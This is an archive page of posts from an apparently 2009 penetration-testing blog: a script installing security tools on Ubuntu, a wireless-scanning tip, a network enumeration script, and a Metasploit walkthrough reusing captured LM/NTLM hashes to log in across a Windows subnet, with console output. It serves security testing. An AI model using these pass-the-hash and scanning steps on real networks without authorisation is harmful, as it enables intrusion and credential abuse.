Archive for November 2009
pentesting with an ubuntu box
here’s a recent drop of a script i use to configure my ubuntu box for pentesting. yes, i could use backtrack (and i do — especially if i’m having wireless issues), but this is a quick way to get an ubuntu box up & running. cheers -jcran
</pre> #!/bin/bash # System Configuration & Utilities apt-get -y install build-essential apt-get -y install linux-headers-`uname -r` apt-get -y install sysvconfig apt-get -y install bum ## Boot-Up Manager apt-get -y install tofrodos ## DOS utils apt-get -y install xinetd ## why not. apt-get -y install unrar ## RAR support apt-get -y install p7zip-full ## 7-Zip support apt-get -y install fcrackzip ## Zip cracking apt-get -y install ipcalc ## handy apt-get -y install sharutils ## uuencode / uudecode apt-get -y install xclip ## piping is handy apt-get -y install ldap-utils apt-get -y install cabextract ## damn microsoft and their fascist compression formats! apt-get -y install g++ apt-get -y install ssh ## Network services apt-get -y install samba apt-get -y install nis apt-get -y install nfs apt-get -y install smbfs ## samba utilities ## apt-get -y install tftpd ## you need to modify the /etc/init.d file... # system monitoring apt-get -y install ntop ## apt-get -y install sysstat ## iostat,sar,mpstat apt-get -y install procinfo # Package Management #apt-get -y install apt-build #apt-get -y install apt-dpkg-ref #apt-get -y install apt-listbugs apt-get -y install apt-file #apt-get -y install apt-howto apt-get -y install apt-utils apt-get -y install apt-listchanges apt-get -y install dconf # Terminal Emulators apt-get -y install tn5250 apt-get -y install screen # Filesystem Support apt-get -y install sshfs apt-get -y install ntfs-3g apt-get -y install ntfs-config apt-get -y install ntfsprogs apt-get -y install mkisofs # Gnome-Specific Configuration apt-get -y install gconf apt-get -y install gnomebaker apt-get -y install nautilus-open-terminal # ISAKMPD # apt-get -y install isakmpd apt-get -y install vpnc # Multimedia apt-get -y install amarok apt-get -y install xmms apt-get -y install xmms-skins apt-get -y install xmms-mp4 apt-get -y install mpg123 apt-get -y install totem-xine apt-get -y install ksnapshot apt-get -y install istanbul apt-get -y install recordmydesktop apt-get -y install gtk-recordmydesktop apt-get -y install xvidcap # Basics # Netcat & Tunnelling apt-get -y install netcat apt-get -y install sbd apt-get -y install cryptcat apt-get -y install socat apt-get -y install vtun apt-get -y install stunnel # Scanning Tools apt-get -y install nmap apt-get -y install nessusd apt-get -y install nessus apt-get -y install fping apt-get -y install hping2 apt-get -y install hping3 apt-get -y install scapy apt-get -y install snmp #apt-get -y install sing #send icmp nasty garbage apt-get -y install traceroute apt-get -y install tcptraceroute apt-get -y install ike-scan ## ipsec vpn tool apt-get -y install nbtscan ## cifs info tool apt-get -y install sslscan # Passive Scanning Tools apt-get -y install p0f apt-get -y install pads # Sniffing Tools apt-get -y install wireshark apt-get -y install ettercap apt-get -y install ettercap-gtk apt-get -y install tcpdump apt-get -y install tcpflow apt-get -y install ssldump apt-get -y install nemesis # packet injection apt-get -y install dsniff apt-get -y install etherape # Libraries apt-get -y install libssl #Medusa apt-get -y install libssl-dev #Medusa apt-get -y install libssh-2 #Medusa apt-get -y install python-pycurl #wfuzz apt-get -y install libnet-dns-perl #fierce.pl apt-get -y install libsnmp-perl #?? apt-get -y install libcrypt-ssleay-perl #HEAD,GET,POST, libwhisker apt-get -y install libnet-ssleay-perl # "" "" apt-get -y install ncurses-dev # kismet-newcore apt-get -y install libpcap-dev # kismet-newcore # Cracking Tools apt-get -y install john apt-get -y install medusa ## apt-get -y install hydra? ## not really that useful.. # Wireless Tools ##apt-get -y install kismet ## disabled because of kismet-ng apt-get -y install aircrack apt-get -y install aircrack-ng # App Layer Tools apt-get -y install wget apt-get -y install curl apt-get -y install nikto ## Scripting apt-get -y install ruby apt-get -y install python apt-get -y install perl apt-get -y install perl-doc apt-get -y install gawk apt-get -y install vim-ruby apt-get -y install vim-python ## Ruby - Gems apt-get -y install gems apt-get -y install rubygems ## Metasploit dependencies apt-get -y install libopenssl-ruby apt-get -y install ruby-libglade2 apt-get -y install libgtk2-ruby ## Scapy - Python Dependencies - http://www.secdev.org/projects/scapy/portability.html apt-get -y install graphviz # graph stuff apt-get -y install imagemagick # graph stuff apt-get -y install python-gnuplot # PacketList.plot() apt-get -y install python-crypto # WEP Stuff apt-get -y install python-visual # 3D Stuff apt-get -y install python-pyx # pdfdump() / psdump() apt-get -y install acroread apt-get -y install gv apt-get -y install sox ## ProxyStrike Dependencies apt-get -y install python-qt4 apt-get -y install python-openssl ## W3af Dependencies apt-get -y install python-pyparsing apt-get -y install python-pydot apt-get -y install python-soappy ## Coding ##apt-get -y install eclipse - get the latest version... apt-get -y install kdevelop apt-get -y install subversion apt-get -y install rapidsvn apt-get -y install vim-full apt-get -y install git apt-get -y install git-core ## Documentation apt-get -y install notecase apt-get -y install vim apt-get -y install liferea ## Web / Browser Utilities apt-get -y install azureus apt-get -y install opera apt-get -y install filezilla apt-get -y install flashplugin-nonfree apt-get -y install pidgin apt-get -y install pidgin-otr apt-get -y install thunderbird apt-get -y install lightning-extension apt-get -y install enigmail apt-get -y install irssi apt-get -y install silc apt-get -y install tor ## Windows Stuff apt-get -y install wine apt-get -y install quicksynergy ## Encryption apt-get -y install dmsetup apt-get -y install password-gorilla apt-get -y install gpa apt-get -y install seahorse ## Java apt-get -y install sun-java6-jre apt-get -y install sun-java6-plugin #set our java version to java-6-sun as this plays well with burpsuite update-java-alternatives -s java-6-sun ## Upgrade & Such apt-get update apt-get upgrade apt-get dist-upgrade ## Remove auto-start services update-rc.d -f exim4 remove update-rc.d -f tor remove update-rc.d -f ntop remove update-rc.d -f p0f remove ## not sure this is necessary update-rc.d -f pads remove update-rc.d -f isakmpd remove update-rc.d -f nessusd remove update-rc.d -f cups remove update-rc.d -f samba remove update-rc.d -f nis remove update-rc.d -f nfs-common remove ### Manual installs ### ------------------------------------------------------------------------------------------ ### truecrypt -- http://www.howtogeek.com/howto/ubuntu/install-truecrypt-on-ubuntu-edgy/ ### - you will need the linux kernel source for this one... ### onesixtyone -- http://www.phreedom.org/solar/onesixtyone/ ### libdvdcss2 -- "sudo /usr/share/doc/libdvdread3/./install-css.sh" <pre> <pre>
WiFiFoFum for locating rogue access points!
what’s that you say? The PCI DSS (wireless supplement) now requires that you have to do quarterly wireless scanning at your facility?
oh? you have no budget?
no problem. get an ipod touch, and download WiFiFoFum from Aspecto Software. For $2.99, you’ve got yourself a wireless scanning solution.
local network enumeration
UPDATED: 11/19/2009
little script i threw together for local network enumeration – uses arp-scan, propecia, and nmap. was going to use it to dynamically generate my subnet (hence the IP parsing), but got lazy at the last minute.
#!/bin/bash
##jcran – 2009## Gather user options
## ——————–
if [ $# -lt 1 ]; then
echo “Usage: $0 [projectname] [scan? (0/1) ] “
exit -1
fiPROJECT=$1 ## name of the project
SCAN=$2 ## whether to scan with propecia / nmapecho “creating project $PROJECT”
if [ -d $PROJECT ]; then
echo “project exists”
else
mkdir $PROJECT
fiIP=`ifconfig eth0 | grep “inet addr:” | ips |cut -d “:” -f 2 | cut -d ” ” -f 1`
SUBNET=`ifconfig eth0 | grep “inet addr:” | ips |cut -d “:” -f 3 | cut -d ” ” -f 1`
RANGE=`ipcalc $IP/$SUBNET | grep “Network:” | cut -d ‘ ‘ -f 4`echo $RANGE
if [ $SCAN -eq 1 ]; then
echo arp scanning “$RANGE”
sudo arp-scan “$RANGE” –interface eth0 > $PROJECT/arp.targets.txtecho local segment targets
cat $PROJECT/arp.targets.txt | ips > $PROJECT/ip.targets.txtecho “scanning for web servers – :80, :443″
propecia $RANGE 80 > $PROJECT/80.targets.txt
propecia $RANGE 443 > $PROJECT/443.targets.txtecho “scanning for basics – :21 :22 :23 :111″
propecia $RANGE 21 > $PROJECT/21.target.txt
propecia $RANGE 22 > $PROJECT/22.targets.txt
propecia $RANGE 23 > $PROJECT/23.targets.txt
propecia $RANGE 111 > $PROJECT/111.targets.txtecho “scanning for windows boxes – :445″
propecia $RANGE 445 > $PROJECT/445.targets.txtecho “scanning for sql server tds – :1433″
propecia $RANGE 1433 > $PROJECT/1433.targets.txtecho “scanning for oracle tns – :1521″
propecia $RANGE 1521 > $PROJECT/1521.targets.txtecho nmap-scanning local ips
nmap -iL $PROJECT/ip.targets.txt -oA $PROJECT/local-attack
fi
cheers
-jcran
owning a windows network
so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:
msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > infoName: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)Provided by:
tebo <tebo@attackresearch.com>Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes Set the SMB service port
SMBDomain WORKGROUP no SMB Domain
SMBPass no SMB Password
SMBUser Administrator no SMB Username
THREADS 1 yes The number of concurrent threadsDescription:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)
To speed it up, set THREADS > 1. Be careful not to set it too high:
[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(’10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ’2009-11-06 10:48:09′, ‘unknown’)
Thanks to tebo for the excellent work. Now, if only it worked with credcollect.
checking valid windows logins with metasploit
so you have some windows creds, and you want to check if they’re valid or not. turns out there’s a bunch of ways to do this:
1) auxiliary/scanner/smb/login
2) db_autopwn -m
3) msfcli scripting
4) sussuro’s method (python scripting through xmlrpc)
others?
